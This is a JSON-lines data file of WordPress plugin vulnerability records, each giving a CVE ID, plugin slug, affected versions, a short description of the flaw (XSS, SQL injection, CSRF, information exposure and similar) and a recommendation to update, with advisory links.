{"CVE_ID":"CVE-2025-6722","slug":"bitfire","versionImpact":"4.5","versionEndExcluding":"4.6","description":"The BitFire Security \u2013 Firewall, WAF, Bot\/Spam Blocker, Login Security plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5 via the bitfire_* directory that automatically gets created and stores potentially sensitive files without any access restrictions. This makes it possible for unauthenticated attackers to extract sensitive data from various files like config.ini, debug.log, and more.","recommendation":"Update to version 4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3334399%40bitfire&new=3334399%40bitfire&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3334399%40bitfire&new=3334399%40bitfire&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3335461%40bitfire&new=3335461%40bitfire&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3335461%40bitfire&new=3335461%40bitfire&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72320980-733d-4fe6-9a13-39c476b77298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72320980-733d-4fe6-9a13-39c476b77298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1861","slug":"antihacker","versionImpact":"4.52","versionEndExcluding":"4.53","description":"The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_truncate_scan_table() function in all versions up to, and including, 4.52. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate the scan table.","recommendation":"Update to version 4.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11088","slug":"simple-membership","versionImpact":"4.5.5","versionEndExcluding":"4.5.6","description":"The Simple Membership plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190023\\\/simple-membership\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190023\\\/simple-membership\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1558b08-a33b-4cf2-bacb-c88065f513cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1558b08-a33b-4cf2-bacb-c88065f513cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2811","slug":"chatbot","versionEndExcluding":"4.5.6","description":"The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks to all admin when setting chatbot and all client when using chatbot","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82a81721-0435-45a6-bd5b-dc90186cf803\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82a81721-0435-45a6-bd5b-dc90186cf803\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2742","slug":"chatbot","versionEndExcluding":"4.5.5","description":"The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f689442a-a851-4140-a10c-ac579f9da142\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f689442a-a851-4140-a10c-ac579f9da142\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1381","slug":"wp-meta-seo","versionEndExcluding":"4.5.5","description":"The WP Meta SEO WordPress plugin before 4.5.5 does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f140a928-d297-4bd1-8552-bfebcedba536\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f140a928-d297-4bd1-8552-bfebcedba536\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.wpscan.com\\\/uncovering-a-phar-deserialization-vulnerability-in-wp-meta-seo-and-escalating-to-rce\\\/\",\"name\":\"https:\\\/\\\/blog.wpscan.com\\\/uncovering-a-phar-deserialization-vulnerability-in-wp-meta-seo-and-escalating-to-rce\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-54676","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.3","versionEndExcluding":"4.5.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita allows Stored XSS. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.3.","recommendation":"Update to version 4.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-by-vcita-plugin-plugin-4-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-by-vcita-plugin-plugin-4-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12710","slug":"wp-appbox","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The WP-Appbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-appbox\\\/tags\\\/4.5.3&new_path=\\\/wp-appbox\\\/tags\\\/4.5.4&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-appbox\\\/tags\\\/4.5.3&new_path=\\\/wp-appbox\\\/tags\\\/4.5.4&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/101451de-1ed4-4717-86c5-a41feafd4c7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/101451de-1ed4-4717-86c5-a41feafd4c7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2255","slug":"essential-blocks","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.5.2 due to insufficient input sanitization and output escaping on user supplied attributes such as listStyle. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.5.2\\\/blocks\\\/TableOfContents.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/4.5.2\\\/blocks\\\/TableOfContents.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3053199\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3053199\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6561","slug":"featured-image-from-url","versionImpact":"4.5.3","versionEndExcluding":"4.5.4","description":"The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the featured image alt text in all versions up to, and including, 4.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4d5ae93-000e-4001-adfa-c11058032469?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4d5ae93-000e-4001-adfa-c11058032469?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/meta-box.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/meta-box.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/category.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/trunk\\\/admin\\\/category.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009699%40featured-image-from-url%2Ftrunk&old=3003342%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3009699%40featured-image-from-url%2Ftrunk&old=3003342%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1780","slug":"companion-sitemap-generator","versionEndExcluding":"4.5.3","description":"The Companion Sitemap Generator WordPress plugin before 4.5.3 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8176308f-f210-4109-9c88-9372415dbed3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8176308f-f210-4109-9c88-9372415dbed3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0876","slug":"wp-meta-seo","versionEndExcluding":"4.5.3","description":"The WP Meta SEO WordPress plugin before 4.5.3 does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0875","slug":"wp-meta-seo","versionEndExcluding":"4.5.3","description":"The WP Meta SEO WordPress plugin before 4.5.3 does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d44e9a45-cbdf-46b1-8b48-7d934b617534\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d44e9a45-cbdf-46b1-8b48-7d934b617534\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2286","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_run_cleanup function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2285","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_switch_db function. This makes it possible for unauthenticated attackers to make changes to the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c659f6d-e02b-42ab-ba02-eb9b00602ad4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c659f6d-e02b-42ab-ba02-eb9b00602ad4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2284","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log Premium plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_switch_db function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers with subscriber-level or higher to make changes to the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e29fd6b-462a-42be-9a2a-b6717b20a937?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e29fd6b-462a-42be-9a2a-b6717b20a937?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2261","slug":"wp-security-audit-log","versionEndExcluding":"4.5.2","description":"The WP Activity Log plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the handle_ajax_call function in versions up to, and including, 4.5.0. This makes it possible for authenticated attackers, with subscriber-level access or higher, to obtain a list of users with accounts on the site. This includes ids, usernames and emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f51f0919-498e-4f86-a933-1b7f2c4a10a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f51f0919-498e-4f86-a933-1b7f2c4a10a4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2286","slug":"wp-security-audit-log-premium","versionEndExcluding":"4.5.2","description":"The WP Activity Log for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.0. This is due to missing or incorrect nonce validation on the ajax_run_cleanup function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Views\\\/Settings.php#L278\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2008e0b-32c6-46fb-93b9-2b0004f478e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2911239%40wp-security-audit-log%2Ftrunk&old=2897171%40wp-security-audit-log%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54356","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5","versionEndExcluding":"4.5.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in vCita.com Online Booking & Scheduling Calendar for WordPress by vcita allows Cross Site Request Forgery.This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n\/a through 4.5.","recommendation":"Update to version 4.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/meeting-scheduler-by-vcita\\\/vulnerability\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9872","slug":"meeting-scheduler-by-vcita","versionImpact":"4.5.1","versionEndExcluding":"4.5.2","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_user_data_callback() function in all versions up to, and including, 4.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts and update settings.","recommendation":"Update to version 4.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200129\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200129\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13475","slug":"small-package-quotes-ups-edition","versionImpact":"4.5.16","versionEndExcluding":"4.5.17","description":"The Small Package Quotes \u2013 UPS Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 4.5.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.5.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62680b5-e9e0-497f-b957-9b223a623917?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62680b5-e9e0-497f-b957-9b223a623917?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49821","slug":"wp-live-chat-software-for-wordpress","versionImpact":"4.5.15","versionEndExcluding":"4.5.16","description":"Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat \u2013 WP live chat plugin for WordPress.This issue affects LiveChat \u2013 WP live chat plugin for WordPress: from n\/a through 4.5.15.\n\n","recommendation":"Update to version 4.5.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-live-chat-software-for-wordpress\\\/wordpress-livechat-plugin-4-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-live-chat-software-for-wordpress\\\/wordpress-livechat-plugin-4-5-15-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4891","slug":"essential-blocks","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tagName\u2019 parameter in versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1bcebb3-920b-40cc-aa5c-24a1f729b28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1bcebb3-920b-40cc-aa5c-24a1f729b28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/AdvancedHeading.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/AdvancedHeading.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087677\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087677\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6962","slug":"wp-meta-seo","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The WP Meta SEO plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.5.12 via the meta description. This makes it possible for unauthenticated attackers to disclose potentially sensitive information via the meta description of password-protected posts.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0323b54b-c15b-4d2d-9e8f-3df87c84dd49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0323b54b-c15b-4d2d-9e8f-3df87c84dd49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
